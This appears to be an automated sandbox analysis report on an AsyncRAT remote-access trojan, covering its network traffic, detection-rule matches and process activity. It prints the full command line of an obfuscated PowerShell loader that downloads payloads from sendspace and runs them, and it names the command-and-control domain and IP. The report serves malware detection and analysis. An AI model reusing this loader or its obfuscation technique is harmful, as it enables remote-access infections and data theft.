        Source: Binary string: System.Core.pdbk source: powershell.exe, 00000006.00000002.2617016962.000000000300F000.00000004.00000020.00020000.00000000.sdmp

        Networking

        Source: Traffic | Snort IDS: 2035595 ET TROJAN Generic AsyncRAT Style SSL Cert 12.202.180.134:8797 -> 192.168.2.6:49711
        Source: Traffic | Snort IDS: 2030673 ET TROJAN Observed Malicious SSL Cert (AsyncRAT Server) 12.202.180.134:8797 -> 192.168.2.6:49711
        Source: Malware configuration extractor | URLs: dhhj.duckdns.org
        Source: unknown | DNS query: name: dhhj.duckdns.org
        Source: global traffic | TCP traffic: 192.168.2.6:49711 -> 12.202.180.134:8797
        Source: Joe Sandbox View | IP Address: 69.31.136.17
        Source: Joe Sandbox View | IP Address: 12.202.180.134
        Source: Joe Sandbox View | IP Address: 104.21.28.80
        Source: Joe Sandbox View | IP Address: 69.31.136.57
        Source: Joe Sandbox View | ASN Name: FISERV-INCUS
        Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
        Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
        Source: global traffic | HTTP traffic detected:
          GET /pro/dl/w4e2qb HTTP/1.1
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
          Host: www.sendspace.com
          Connection: Keep-Alive
        Source: global traffic | HTTP traffic detected:
          GET /dlpro/5990f4102977ad47c8b1158344464586/664f92e4/w4e2qb/Bystoerrelse.fla HTTP/1.1
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
          Host: fs13n2.sendspace.com
          Connection: Keep-Alive
        Source: global traffic | HTTP traffic detected:
          GET /pro/dl/6f2c5c HTTP/1.1
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
          Host: www.sendspace.com
          Cache-Control: no-cache
        Source: global traffic | HTTP traffic detected:
          GET /dlpro/2e5b0068e88ecbc579c4ba215340ac1a/664f9316/6f2c5c/JXfZIuRPwNaOvold98.bin HTTP/1.1
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
          Cache-Control: no-cache
          Host: fs03n5.sendspace.com
          Connection: Keep-Alive
          Cookie: SID=8h7tvviacjavkonspru2dnmd45
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: global traffic | DNS traffic detected: DNS query: www.sendspace.com
        Source: global traffic | DNS traffic detected: DNS query: fs13n2.sendspace.com
        Source: global traffic | DNS traffic detected: DNS query: fs03n5.sendspace.com
        Source: global traffic | DNS traffic detected: DNS query: dhhj.duckdns.org
        Source: wab.exe, 0000000A.00000002.3343246570.0000000007DD2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabq
        Source: wab.exe, 0000000A.00000002.3343246570.0000000007DA3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/env
        Source: powershell.exe, 00000003.00000002.2793992270.0000017BC15B1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://fs13n2.sendspace.com
        Source: powershell.exe, 00000003.00000002.2910312975.0000017BCF83F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2621078427.0000000005BD7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
        Source: powershell.exe, 00000006.00000002.2617612973.0000000004CCC000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
        Source: powershell.exe, 00000003.00000002.2793992270.0000017BBF7D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2617612973.0000000004B71000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.3357559154.0000000023691000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
        Source: powershell.exe, 00000006.00000002.2617612973.0000000004CCC000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
        Source: powershell.exe, 00000003.00000002.2793992270.0000017BC1579000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.sendspace.com
        Source: powershell.exe, 00000003.00000002.2793992270.0000017BBF7D1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68
        Source: powershell.exe, 00000006.00000002.2617612973.0000000004B71000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore6lB
        Source: powershell.exe, 00000006.00000002.2621078427.0000000005BD7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
        Source: powershell.exe, 00000006.00000002.2621078427.0000000005BD7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
        Source: powershell.exe, 00000006.00000002.2621078427.0000000005BD7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
        Source: wab.exe, 0000000A.00000002.3343246570.0000000007D40000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://fs03n5.sendspace.com/
        Source: wab.exe, 0000000A.00000003.2605230606.0000000007D57000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://fs03n5.sendspace.com/79c4ba215340ac1a/664f9316/6f2c5c/JXfZIuRPwNaOvold98.bin
        Source: wab.exe, 0000000A.00000003.2605230606.0000000007D57000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.2613840916.0000000007D57000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.3343246570.0000000007D40000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://fs03n5.sendspace.com/dlpro/2e5b0068e88ecbc579c4ba215340ac1a/664f9316/6f2c5c/JXfZIuRPwNaOvold
        Source: wab.exe, 0000000A.00000003.2605230606.0000000007D57000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.2613840916.0000000007D57000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://fs03n5.sendspace.com/hf
        Source: wab.exe, 0000000A.00000003.2605230606.0000000007D57000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://fs03n5.sendspace.com/om:443
        Source: powershell.exe, 00000003.00000002.2793992270.0000017BC159E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://fs13n2.sendspaX
        Source: powershell.exe, 00000003.00000002.2793992270.0000017BBFC63000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2793992270.0000017BC159E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://fs13n2.sendspace.com
        Source: powershell.exe, 00000003.00000002.2793992270.0000017BBFC63000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2793992270.0000017BC159A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2793992270.0000017BC159E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2793992270.0000017BBFC5F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2793992270.0000017BC1579000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://fs13n2.sendspace.com/dlpro/5990f4102977ad47c8b1158344464586/664f92e4/w4e2qb/Bystoerrelse.fla
        Source: powershell.exe, 00000006.00000002.2617612973.0000000004CCC000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
        Source: powershell.exe, 00000003.00000002.2793992270.0000017BC0A66000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://go.micro
        Source: powershell.exe, 00000003.00000002.2910312975.0000017BCF83F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2621078427.0000000005BD7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
        Source: powershell.exe, 00000003.00000002.2793992270.0000017BC1091000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2793992270.0000017BBF9FD000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.sendspace.com
        Source: wab.exe, 0000000A.00000002.3343246570.0000000007CE8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.sendspace.com/
        Source: wab.exe, 0000000A.00000002.3343137596.0000000007C40000.00000004.00001000.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.2605230606.0000000007D57000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.3343246570.0000000007D23000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.2613840916.0000000007D57000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.2605161502.0000000007D50000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.sendspace.com/pro/dl/6f2c5c
        Source: powershell.exe, 00000003.00000002.2793992270.0000017BBF9FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.sendspace.com/pro/dl/w4e2qbP
        Source: powershell.exe, 00000006.00000002.2617612973.0000000004CCC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.sendspace.com/pro/dl/w4e2qbXR
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49700
        Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49699 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49699
        Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
        Source: unknownHTTPS traffic detected: 104.21.28.80:443 -> 192.168.2.6:49699 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 69.31.136.57:443 -> 192.168.2.6:49700 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.28.80:443 -> 192.168.2.6:49708 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 69.31.136.17:443 -> 192.168.2.6:49709 version: TLS 1.2

        Key, Mouse, Clipboard, Microphone and Screen Capturing

        Source: Yara match | File source: 0000000A.00000002.3357559154.0000000023691000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: Process Memory Space: wab.exe PID: 5892, type: MEMORYSTR

        System Summary

        Source: amsi32_4324.amsi.csv, type: OTHER | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
        Source: dump.pcap, type: PCAP | Matched rule: Detects AsyncRAT Author: ditekSHen
        Source: 0000000A.00000002.3343246570.0000000007DD2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects AsyncRAT Author: ditekSHen
        Source: 0000000A.00000002.3357559154.0000000023691000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects AsyncRAT Author: ditekSHen
        Source: 0000000A.00000002.3343246570.0000000007DA3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects AsyncRAT Author: ditekSHen
        Source: Process Memory Space: powershell.exe PID: 5700, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
        Source: Process Memory Space: powershell.exe PID: 4324, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
        Source: Process Memory Space: wab.exe PID: 5892, type: MEMORYSTR | Matched rule: Detects AsyncRAT Author: ditekSHen
        Source: C:\Windows\System32\cmd.exe | Process created: Commandline size = 6358
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: Commandline size = 6382
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 3_2_00007FFD347EB939
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 3_2_00007FFD347EAB89
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 3_2_00007FFD347E64A7
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 3_2_00007FFD347E3DF2
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 3_2_00007FFD347E427B
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 3_2_00007FFD348B4049
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 6_2_04B5E928
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 6_2_04B5F1F8
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 6_2_04B5E5E0
        Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_023065C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_02305CF0
        Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_0230A7B0
        Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_023059A8
        Source: amsi32_4324.amsi.csv, type: OTHER | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
        Source: dump.pcap, type: PCAP | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
        Source: 0000000A.00000002.3343246570.0000000007DD2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
        Source: 0000000A.00000002.3357559154.0000000023691000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
        Source: 0000000A.00000002.3343246570.0000000007DA3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
        Source: Process Memory Space: powershell.exe PID: 5700, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
        Source: Process Memory Space: powershell.exe PID: 4324, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
        Source: Process Memory Space: wab.exe PID: 5892, type: MEMORYSTR | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
        Source: classification engine | Classification label: mal100.troj.evad.winCMD@13/9@4/4
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Roaming\Bevogtes140.Out
        Source: C:\Program Files (x86)\Windows Mail\wab.exe | Mutant created: NULL
        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2752:120:WilError_03
        Source: C:\Program Files (x86)\Windows Mail\wab.exe | Mutant created: \Sessions\1\BaseNamedObjects\AsyncMutex_6SI8OkPnk
        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3360:120:WilError_03
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1c0vfxcq.np5.ps1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=5700
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=4324
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File read: C:\Users\desktop.ini
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
        Source: unknown | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\xff.cmd" "
        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Lassoing = 1;$Rasophore='Sub';$Rasophore+='strin';$Rasophore+='g';Function Ugedagens($Outdure){$Frys=$Outdure.Length-$Lassoing;For($Interproducing=5;$Interproducing -lt $Frys;$Interproducing+=6){$Unlecherous+=$Outdure.$Rasophore.Invoke( $Interproducing, $Lassoing);}$Unlecherous;}function Semuljegrynets($Barbarized){. ($adenoncus) ($Barbarized);}$Currycombing=Ugedagens 'ChronM,jerno istnzDes ei .rdmlSanktlW lliaLevul/Outca5Averr..eman0Uforl Ort,g(HandlWSendei Precn,niffd,edeoo Bor wDioxas W,gg Ko,svNCrossTInope Overl1 indr0Klamm.Op.ak0Mavel;Instr Ro ndWnonfaiBeg.enFlygt6Totaq4Lufth;Bo.ti RadixFylgj6 G.nn4Tachy;ha ss Ek.pr Sy.ev lndi: iece1Tilst2J ntj1Pisto.Antid0Bavn.)Plant oraGKibose,odlicRe,ulk,verfoFli o/Succu2N.ntr0Pulve1hj.ej0Forfa0ubeta1 Ekst0 Fort1Fl,pp LeddFRebediTorskrselvgehumatf,robyoBarvexSkjo /Dress1,ydro2urtid1 cent.Begal0Opera ';$Huaco=Ugedagens ' Zo,lUSkaloskrnereRe rorDema,-StormAEmpreg DisseLandsnMartetM tap ';$Fluernes=Ugedagens 'Serv hCathatUna tt Su,ephe,ges cevi:Du,le/Sil,n/ApprewDiletwA,vaewPlkke. Milis La,reFarmanLadeddCrystsNonh.pEje.ta NivecCurn.eHande.MaadgcCicerochalomAston/Anen,pV.rmtrLyzetoAr,th/IodocdLinielKom.e/AfskewMulti4HomebeEtabl2Preenq Udadb K.st ';$Astrographer=Ugedagens 'Homol>Fossi ';$adenoncus=Ugedagens 'Afmnsi ExhoeSv,nfxInku. ';$Minussernes='Olieraffinaderiets';$Omskrivelses = Ugedagens ' V,rde oplacPopl,hFi ucoBronc Svog%B.lthaKiropp Svamp De,adOut aaU,trytTorrea,push%Shodd\SyndeBS.mshe,aksevSmileoSmalngAlumitUnderePolemsDeam,1Cervi4Dispe0Quadr. Me,lO Sv tuintegtAnt.s V,let&St,ll&Canto For.oeOmlydcStuddhFaktuoAmts OrdretDire. 
';Semuljegrynets (Ugedagens 'Re,et$ lectg DirelOrthooS rapb TranaSequelSmerg:StillARe.idpAssaypv.rdelBlreraFol.euPlinksNeuroeM tenr Expls ode=Ka.ao( HardcUn elmPhagodGasco Nonre/Girl,clikvi Jordr$UndskOMaku mPantos Bli k Mor.rretsbi ForsvCharleH,athlAsylssDistieosteosTante)Udski ');Semuljegrynets (Ugedagens 'Netts$ C.okgelevtlSkeigoMisemb elveaRegovlFa,il:littoF pr.moExpanr S brvCons,aBesk.yKandi= Subp$ HopoFBjrgilInteguTapp,eToothr.pegenImpe.eTegnes Hyst.Bes as,igtipfungulS,andi U jetDok m(Punkt$RespeA Kr.dsAdnottG,derrS,mmeoZuluegBrom,rs.ranaEfterpKonflh fhne.umphrRling) .nsl ');$Fluernes=$Forvay[0];$Underabyss= (Ugedagens 'Bogka$rygergRugerlUdsmyoOffe bAcridaSkftelSkift:VegetF Ga eeS.rigepressrBlodsi Em ee Tetr= N.nrN Dybte Te,swFo,ho-ChaveO ymidbH terj Ove.eRullec kul,tUdfri St.tiSDiv,ryTruansMelilt FabiePhilom Mark.Por.uN evoceAristtMalap.QuentWFupmaespectb EncrC InfalBese.i.itike partnSpiset');$Underabyss+=$Applausers[1];Semuljegrynets ($Underabyss);Semuljegrynets (Ugedagens ' Auto$Stap Fnedere PrveeDruggrTurfsiHaplyeFogc.. N,tuHTaurieInexhaB ndedMinice IonirDharasFort [Nrtb $Op,inHK,nsluOkk paDusticDressoTrukn] Moll= .ott$TootiCSynaeumascurSl tsrC,lebyNonlycMerrio EccrmQu tabUnabsi,ingenresungCu,pi ');$aktualitetens=Ugedagens 'Gra.e$ BalsFForese F.ageOmulcrLaniti
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Bevogtes140.Out && echo t"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Lassoing = 1;$Rasophore='Sub';$Rasophore+='strin';$Rasophore+='g';Function Ugedagens($Outdure){$Frys=$Outdure.Length-$Lassoing;For($Interproducing=5;$Interproducing -lt $Frys;$Interproducing+=6){$Unlecherous+=$Outdure.$Rasophore.Invoke( $Interproducing, $Lassoing);}$Unlecherous;}function Semuljegrynets($Barbarized){. ($adenoncus) ($Barbarized);}$Currycombing=Ugedagens 'ChronM,jerno istnzDes ei .rdmlSanktlW lliaLevul/Outca5Averr..eman0Uforl Ort,g(HandlWSendei Precn,niffd,edeoo Bor wDioxas W,gg Ko,svNCrossTInope Overl1 indr0Klamm.Op.ak0Mavel;Instr Ro ndWnonfaiBeg.enFlygt6Totaq4Lufth;Bo.ti RadixFylgj6 G.nn4Tachy;ha ss Ek.pr Sy.ev lndi: iece1Tilst2J ntj1Pisto.Antid0Bavn.)Plant oraGKibose,odlicRe,ulk,verfoFli o/Succu2N.ntr0Pulve1hj.ej0Forfa0ubeta1 Ekst0 Fort1Fl,pp LeddFRebediTorskrselvgehumatf,robyoBarvexSkjo /Dress1,ydro2urtid1 cent.Begal0Opera ';$Huaco=Ugedagens ' Zo,lUSkaloskrnereRe rorDema,-StormAEmpreg DisseLandsnMartetM tap ';$Fluernes=Ugedagens 'Serv hCathatUna tt Su,ephe,ges cevi:Du,le/Sil,n/ApprewDiletwA,vaewPlkke. Milis La,reFarmanLadeddCrystsNonh.pEje.ta NivecCurn.eHande.MaadgcCicerochalomAston/Anen,pV.rmtrLyzetoAr,th/IodocdLinielKom.e/AfskewMulti4HomebeEtabl2Preenq Udadb K.st ';$Astrographer=Ugedagens 'Homol>Fossi ';$adenoncus=Ugedagens 'Afmnsi ExhoeSv,nfxInku. ';$Minussernes='Olieraffinaderiets';$Omskrivelses = Ugedagens ' V,rde oplacPopl,hFi ucoBronc Svog%B.lthaKiropp Svamp De,adOut aaU,trytTorrea,push%Shodd\SyndeBS.mshe,aksevSmileoSmalngAlumitUnderePolemsDeam,1Cervi4Dispe0Quadr. Me,lO Sv tuintegtAnt.s V,let&St,ll&Canto For.oeOmlydcStuddhFaktuoAmts OrdretDire. 
';Semuljegrynets (Ugedagens 'Re,et$ lectg DirelOrthooS rapb TranaSequelSmerg:StillARe.idpAssaypv.rdelBlreraFol.euPlinksNeuroeM tenr Expls ode=Ka.ao( HardcUn elmPhagodGasco Nonre/Girl,clikvi Jordr$UndskOMaku mPantos Bli k Mor.rretsbi ForsvCharleH,athlAsylssDistieosteosTante)Udski ');Semuljegrynets (Ugedagens 'Netts$ C.okgelevtlSkeigoMisemb elveaRegovlFa,il:littoF pr.moExpanr S brvCons,aBesk.yKandi= Subp$ HopoFBjrgilInteguTapp,eToothr.pegenImpe.eTegnes Hyst.Bes as,igtipfungulS,andi U jetDok m(Punkt$RespeA Kr.dsAdnottG,derrS,mmeoZuluegBrom,rs.ranaEfterpKonflh fhne.umphrRling) .nsl ');$Fluernes=$Forvay[0];$Underabyss= (Ugedagens 'Bogka$rygergRugerlUdsmyoOffe bAcridaSkftelSkift:VegetF Ga eeS.rigepressrBlodsi Em ee Tetr= N.nrN Dybte Te,swFo,ho-ChaveO ymidbH terj Ove.eRullec kul,tUdfri St.tiSDiv,ryTruansMelilt FabiePhilom Mark.Por.uN evoceAristtMalap.QuentWFupmaespectb EncrC InfalBese.i.itike partnSpiset');$Underabyss+=$Applausers[1];Semuljegrynets ($Underabyss);Semuljegrynets (Ugedagens ' Auto$Stap Fnedere PrveeDruggrTurfsiHaplyeFogc.. N,tuHTaurieInexhaB ndedMinice IonirDharasFort [Nrtb $Op,inHK,nsluOkk paDusticDressoTrukn] Moll= .ott$TootiCSynaeumascurSl tsrC,lebyNonlycMerrio EccrmQu tabUnabsi,ingenresungCu,pi ');$aktualitetens=Ugedagens 'Gra.e$ BalsF
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Bevogtes140.Out && echo t"
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
        Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdatauser.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
